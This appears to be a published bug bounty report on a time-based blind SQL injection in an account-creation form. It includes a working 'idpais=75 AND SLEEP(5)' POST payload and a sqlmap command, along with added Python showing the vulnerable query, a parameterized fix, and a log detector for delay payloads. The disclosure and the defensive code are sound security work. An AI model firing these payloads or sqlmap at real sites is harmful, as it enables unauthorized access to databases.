Time Based Blind SQL Injection

  • Reported to Private
  • Reported by Haqtify
  • Critical (8.8)
  • $800
  • Published 3 years ago

URL:

https://tools.redacted.com/en/mybox/new-account/

Description:

The resource doesn’t properly sanitize the “idpais” variable before putting it into a MySQL statement. This results in a Blind SQL Injection vulnerability. We can demonstrate the vulnerability by making the MySQL server sleep for a while before responding.
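The defect described above is a query built by string concatenation, and the fix is to validate the value's shape and bind it as a query parameter. The following is an added example, not code from the report or from the affected site (whose server-side language is not shown). It assumes a country table named "paises" and uses SQLite in place of MySQL so it runs offline; SQLite has no SLEEP() function, so the vulnerable path fails with a database error that shows the injected text was parsed as SQL, while the hardened path rejects it before any query runs.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for the country table that "idpais" (country id) appears to key into.
# SQLite is used instead of MySQL so the example runs offline; the injection point is the same.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE paises (idpais INTEGER PRIMARY KEY, nombre TEXT)")
    conn.executemany("INSERT INTO paises VALUES (?, ?)", [(1, "United States"), (75, "Spain")])
    return conn

def lookup_vulnerable(conn, idpais):
    # The reported defect: the raw form value is pasted into the statement, so whatever
    # the client sends becomes SQL syntax rather than data.
    sql = "SELECT nombre FROM paises WHERE idpais = " + idpais
    return conn.execute(sql).fetchall()

def lookup_safe(conn, idpais):
    # Fix 1: enforce the expected shape (a country id is a small positive integer).
    if not idpais.isdigit():
        raise ValueError("idpais must be a positive integer")
    # Fix 2: bind the value as a query parameter; the SQL text itself never changes.
    sql = "SELECT nombre FROM paises WHERE idpais = ?"
    return conn.execute(sql, (int(idpais),)).fetchall()

def handle_request(conn, form_body, safe):
    """Extract idpais from a urlencoded body and run the lookup.
    Returns ("ok", rows), ("rejected", reason) or ("db_error", message)."""
    idpais = parse_qs(form_body).get("idpais", [""])[0]
    try:
        rows = lookup_safe(conn, idpais) if safe else lookup_vulnerable(conn, idpais)
        return ("ok", rows)
    except ValueError as e:
        return ("rejected", str(e))
    except sqlite3.OperationalError as e:
        # SQLite has no SLEEP(); the error proves the injected token reached the SQL parser
        # as a function call instead of being treated as a value.
        return ("db_error", str(e))

# Constructed bodies: a benign one, and the report's payload trimmed to the relevant fields.
BENIGN_BODY = "langdir=en%2F&nombre=dfd&idpais=75&cp=10005"
INJECTED_BODY = "langdir=en%2F&nombre=dfd&idpais=75 AND SLEEP(5)&cp=10005"

if __name__ == "__main__":
    db = make_db()
    for body in (BENIGN_BODY, INJECTED_BODY):
        print("vulnerable:", handle_request(db, body, safe=False))
        print("safe:      ", handle_request(db, body, safe=True))
```

Against a real MySQL backend the vulnerable path would not error but would stall for the requested delay; the hardened path behaves identically on both engines because the value never reaches the SQL text.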

Steps to Reproduce:

1) Go to this URL:

https://tools.redacted.com/en/mybox/new-account/

2) Now create an account and observe the POST request; the modified request is shown below.

3) The vulnerable parameter “idpais” is passed in the POST body; we insert a blind SQL injection payload there.

4) This confirms a time-based blind SQL injection.

Request:

POST /en/mybox/finish-new-account/ HTTP/1.1
Host: tools.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 295
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

langdir=en%2F&mr_mrs=Mr&nombre=dfd&apellidos=fdfsdfd&email=test%40abc.com&idpais=75 AND SLEEP(5)&countryCallingCode=%2B+1&telefono=219923171&nacimiento=1990-05-04&direccion=ffddf+&ciudad=dfdffdf&cp=10005&password=Passwd1&renewPassword=PAsswd1&empr_omitir=on&acept-1=on&accept_marketing=on&accept_profile=on

The response should arrive after around 5 seconds, which shows that the SLEEP command was executed.
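From the defender's side, the request above leaves two traces: a non-numeric value in a parameter that should only ever be an integer, and a response that takes about as long as the requested delay. The following is an added example, not part of the report, that scans constructed access-log lines for both signals. The log format (timestamp, method, path, client, rt=seconds, body="...") and the set of integer-only parameters are assumptions; the parameter names and payload shape come from the request in the report.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample log lines (not taken from the report). The second and third carry the
# report's payload in two encodings; the fourth is benign traffic that mentions "Sleep" as text.
SAMPLE_LOG = """\
2021-06-10T10:01:02Z POST /en/mybox/finish-new-account/ 203.0.113.5 rt=0.118 body="langdir=en%2F&nombre=dfd&idpais=75&cp=10005"
2021-06-10T10:01:09Z POST /en/mybox/finish-new-account/ 203.0.113.5 rt=5.204 body="langdir=en%2F&nombre=dfd&idpais=75+AND+SLEEP%285%29&cp=10005"
2021-06-10T10:01:15Z POST /en/mybox/finish-new-account/ 203.0.113.5 rt=5.199 body="langdir=en%2F&nombre=dfd&idpais=75%20AND%20sleep(5)&cp=10005"
2021-06-10T10:02:30Z POST /en/mybox/finish-new-account/ 198.51.100.7 rt=0.097 body="langdir=en%2F&nombre=Sleep+Well&idpais=76&cp=10006"
"""

# Assumed log layout; adjust the pattern to the real access-log format.
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<method>\S+) (?P<path>\S+) (?P<client>\S+) '
    r'rt=(?P<rt>[\d.]+) body="(?P<body>[^"]*)"$'
)
# MySQL time-delay functions followed by an opening parenthesis (case-insensitive).
TIME_FUNC_RE = re.compile(r'\b(sleep|benchmark)\s*\(', re.IGNORECASE)
# Parameters that, per the form in the report, should only ever hold integers (assumption).
INTEGER_PARAMS = {"idpais", "cp"}
# Response time above which a request counts as delayed; the report's payload sleeps 5 s.
SLOW_SECONDS = 3.0

def analyze_line(line):
    """Parse one log line and return a verdict dict, or None if the line does not match the layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rt = float(m["rt"])
    reasons = []
    for name, values in parse_qs(m["body"], keep_blank_values=True).items():
        for value in values:
            # parse_qs decoded once; decode again so a double-encoded payload is still inspected.
            # (This is for inspection only, so turning a literal '+' into a space is acceptable.)
            decoded = unquote_plus(value)
            if name in INTEGER_PARAMS and not decoded.isdigit():
                reasons.append(f"non-numeric value in integer parameter {name!r}: {decoded!r}")
            if TIME_FUNC_RE.search(decoded):
                reasons.append(f"time-delay SQL function in parameter {name!r}: {decoded!r}")
    if rt >= SLOW_SECONDS:
        reasons.append(f"slow response ({rt:.1f}s)")
    # A slow response on its own is noise; a payload pattern makes the line suspicious, and a
    # payload pattern together with the delay is the time-based blind SQLi signature.
    suspicious = any(r.startswith(("non-numeric", "time-delay")) for r in reasons)
    return {
        "ts": m["ts"], "client": m["client"], "path": m["path"], "rt": rt,
        "reasons": reasons, "suspicious": suspicious,
        "confirmed_delay": suspicious and rt >= SLOW_SECONDS,
    }

def scan_log(text):
    """Return the verdicts for every parseable line that carries a payload pattern."""
    verdicts = (analyze_line(line) for line in text.splitlines())
    return [v for v in verdicts if v and v["suspicious"]]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        flag = "CONFIRMED DELAY" if hit["confirmed_delay"] else "pattern only"
        print(hit["ts"], hit["client"], hit["path"], flag)
        for reason in hit["reasons"]:
            print("   -", reason)
```

The integer-shape check is the more robust of the two signals: it does not depend on a keyword list and would still fire on a payload that used a function the regex does not know. The response-time check is what upgrades a pattern match to a confirmed delay, which is the evidence a responder needs to treat the endpoint as exploitable rather than merely probed.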

Manual POC:


SQLMAP POC:


SQLMAP Command: (POST Request)

sqlmap -r request.txt -p idpais